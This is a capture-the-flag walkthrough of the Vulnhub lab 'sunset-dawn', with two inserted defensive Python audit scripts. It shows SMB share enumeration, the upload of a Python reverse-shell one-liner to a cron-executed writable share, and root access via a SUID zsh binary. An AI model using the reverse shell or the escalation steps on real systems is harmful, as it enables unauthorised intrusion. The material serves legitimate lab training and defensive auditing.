Vulnhub: sunset-dawn

This is the second box in the sunset series. These boxes are great for beginners. This box has SMB on it, and it is always good to practice with SMB.

Scanning

Finding the machine on the network

Nmap scan report for 192.168.56.131
Host is up (0.000083s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql

More Scanning

Finding more details about running services

crazyeights@es-base:~$ nmap -A -p- 192.168.56.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-29 18:00 EST
Nmap scan report for 192.168.56.131
Host is up (0.00011s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
[SNIP]
Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
[SNIP]

Web:

Index Page:

Enumerating:

Using dirb to look for more files on the server:

crazyeights@es-base:~$ dirb http://192.168.56.131

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Dec 29 18:02:31 2020
URL_BASE: http://192.168.56.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.131/ ----
+ http://192.168.56.131/index.html (CODE:200|SIZE:791)                         
==> DIRECTORY: http://192.168.56.131/logs/                                     
+ http://192.168.56.131/server-status (CODE:403|SIZE:302)  

The logs directory seems promising.

  • In management.log we find several usernames: dawn, ganimedes.

  • We can also see that there are several cron jobs running.

  • The management log is the only one we have permission to access.

SMB:

List available shares:

crazyeights@es-base:~$ smbclient -L \\dawn -I 192.168.56.131 -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

Connect to the share ITDEPT:

crazyeights@es-base:~$ smbclient \\\\dawn\\ITDEPT -I 192.168.56.131 -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  2 23:23:20 2019
  ..                                  D        0  Fri Aug  2 23:21:39 2019

		7158264 blocks of size 1024. 3478908 blocks available
smb: \> exit

Check if share is writeable:

crazyeights@es-base:~$ smbmap -H 192.168.56.131 -s ITDEPT -d dawn
[+] IP: 192.168.56.131:445	Name: 192.168.56.131                                    
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	ITDEPT                                            	READ, WRITE	PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.9.5-Debian)
crazyeights@es-base:~$ 

Looking back at management.log we can see that cron jobs execute ITDEPT/product-control and ITDEPT/web-control from the directory that is exported as the writable share. We could try to create a script of that name and upload it to the share.

2020/12/29 18:02:01 CMD: UID=1000 PID=859    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2020/12/29 18:02:01 CMD: UID=33   PID=858    | /bin/sh -c /home/dawn/ITDEPT/web-control 
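From the defender's side, the finding above (a scheduled task whose script lives inside an anonymously writable SMB share) can be caught by auditing the same pspy-style log. The following is an added example, not code from the original post; the log lines are constructed in the management.log format shown above, and the share-to-directory map is an assumption an administrator would derive from smb.conf.

```python
import re
from pathlib import PurePosixPath

# Constructed sample lines in the management.log (pspy) format seen on the box.
SAMPLE_LOG = """\
2020/12/29 18:02:01 CMD: UID=1000 PID=859    | /bin/sh -c /home/dawn/ITDEPT/product-control
2020/12/29 18:02:01 CMD: UID=33   PID=858    | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/12/29 18:02:01 CMD: UID=0    PID=857    | /usr/sbin/CRON -f
"""

# Assumed share map: exported directory -> writable by guests? (smbmap showed
# ITDEPT as READ, WRITE for an anonymous session on this box.)
SHARES = {"/home/dawn/ITDEPT": True, "/var/lib/samba/printers": False}

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s*\| (?P<cmd>.*)$"
)

def executed_path(cmd):
    """Return the script a '/bin/sh -c <path>' invocation runs, else argv[0]."""
    parts = cmd.split()
    if len(parts) >= 3 and parts[0] in ("/bin/sh", "/bin/bash", "sh", "bash") and parts[1] == "-c":
        return parts[2]
    return parts[0] if parts else ""

def under(path, root):
    """True when path lies inside directory root (pure path logic, no filesystem access)."""
    try:
        PurePosixPath(path).relative_to(root)
        return True
    except ValueError:
        return False

def audit(log_text, shares=SHARES):
    """Flag every logged command whose executable sits inside a guest-writable share."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path = executed_path(m["cmd"])
        for root, writable in shares.items():
            if writable and under(path, root):
                findings.append({"uid": int(m["uid"]), "pid": int(m["pid"]),
                                 "path": path, "share": root})
    return findings
```

Each finding names the UID that will run attacker-supplied content; on this box the fix is to move the control scripts out of the share or drop the share's guest write access.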

Created a file product-control containing a Python reverse shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Started a listener

crazyeights@es-base:~$ nc -lvp 1234
    listening on [any] 1234 ...

Uploaded the file:

crazyeights@es-base:~$ smbclient \\\\dawn\\ITDEPT -I 192.168.56.131 -N
Try "help" to get a list of possible commands.
smb: \> put product-control
putting file product-control as \product-control (6.8 kb/s) (average 6.8 kb/s)
smb: \> 

  • Now have access as user dawn.

  • Look for commands the user can run with elevated privileges.

$ sudo -l
Matching Defaults entries for dawn on dawn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql
$   

  • Couldn’t get this (mysql as root) to work.

  • Look for SUID binaries, which the user can run with effective root privileges:

$ find / -perm -u=s 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT

  • Checking GTFOBins.

  • zsh allows you to execute commands as a different effective user.

  • Use it to get the root flag:

$ zsh 
id
uid=1000(dawn) gid=1000(dawn) euid=0(root) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
cd /root
ls
flag.txt
pspy64
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!

flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}
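The SUID list above is exactly what a defender should be reviewing on a box like this: a SUID shell (zsh) and a SUID bit on a share directory under /home are the two entries that do not belong. The following is an added triage example, not code from the original post; the input is the page's own find(1) output, and the baseline of expected SUID files is an assumption built from the remaining entries rather than taken from a package manifest.

```python
from pathlib import PurePosixPath

# Constructed sample input: the `find / -perm -u=s` output from the box.
SAMPLE_FIND = """\
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
"""

# Assumed baseline of SUID files expected on this Debian install (an admin would
# generate this from a known-good host or package metadata instead).
BASELINE = {
    "/usr/sbin/mount.cifs", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/bin/su", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/gpasswd",
    "/usr/bin/chsh", "/usr/bin/umount", "/usr/bin/chfn",
}
# Shells and interpreters that, with SUID set, hand any local user an euid=0 shell.
SHELLS = {"sh", "bash", "zsh", "dash", "ksh", "fish", "python", "python3", "perl", "ruby"}
# Trees where a SUID bit should never appear (user-controlled content).
USER_ROOTS = ("/home", "/tmp", "/var/tmp", "/dev/shm")

def triage(find_output, baseline=BASELINE):
    """Return {path: [reasons]} for every SUID entry that deserves a closer look."""
    flagged = {}
    for path in find_output.split():
        reasons = []
        name = PurePosixPath(path).name
        if path not in baseline:
            reasons.append("not in baseline")
        if name in SHELLS or name.rstrip("0123456789.") in SHELLS:
            reasons.append("shell/interpreter with SUID")
        if any(path == r or path.startswith(r + "/") for r in USER_ROOTS):
            reasons.append("SUID under user-writable tree")
        if reasons:
            flagged[path] = reasons
    return flagged
```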

Feel like I missed something.

FIN.